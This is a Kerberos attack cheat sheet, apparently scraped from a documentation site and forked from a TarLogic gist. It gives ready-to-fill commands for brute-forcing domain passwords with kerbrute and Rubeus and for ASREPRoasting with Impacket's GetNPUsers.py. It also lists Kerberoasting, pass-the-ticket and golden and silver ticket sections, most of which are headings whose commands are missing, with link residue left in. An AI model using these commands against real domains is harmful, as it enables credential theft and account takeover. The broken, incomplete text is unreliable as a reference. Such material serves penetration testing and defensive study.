Kerberos cheatsheet

This is forked from this gist thanks to TarLogic for the hard work https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4aarrow-up-right

Bruteforcing

With kerbrute.pyarrow-up-right:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeusarrow-up-right version with brute module:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

ASREPRoast

With Impacketarrow-up-right example GetNPUsers.py:

# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

With Rubeusarrow-up-right:

Cracking with dictionary of passwords:

Kerberoasting

With Impacketarrow-up-right example GetUserSPNs.py:

With Rubeusarrow-up-right:

With Powershell:

Cracking with dictionary of passwords:

Overpass The Hash/Pass The Key (PTK)

By using Impacketarrow-up-right examples:

With Rubeusarrow-up-right and PsExecarrow-up-right:

Pass The Ticket (PTT)

Harvest tickets from Linux

Check type and location of tickets:

If none return, default is FILE:/tmp/krb5cc_%{uid}.

In case of file tickets, you can copy-paste (if you have permissions) for use them.

In case of being KEYRING tickets, you can use tickeyarrow-up-right to get them:

Harvest tickets from Windows

With Mimikatzarrow-up-right:

With Rubeusarrow-up-right in Powershell:

To convert tickets between Linux/Windows format with ticket_converter.pyarrow-up-right:

Using ticket in Linux:

With Impacketarrow-up-right examples:

Using ticket in Windows

Inject ticket with Mimikatzarrow-up-right:

Inject ticket with Rubeusarrow-up-right:

Execute a cmd in the remote machine with PsExecarrow-up-right:

Silver ticket

With Impacketarrow-up-right examples:

With Mimikatzarrow-up-right:

Inject ticket with Rubeusarrow-up-right:

Execute a cmd in the remote machine with PsExecarrow-up-right:

Golden ticket

With Impacketarrow-up-right examples:

With Mimikatzarrow-up-right:

Inject ticket with Rubeusarrow-up-right:

Execute a cmd in the remote machine with PsExecarrow-up-right:

Misc

To get NTLM from password:

Tools

Last updated

Was this helpful?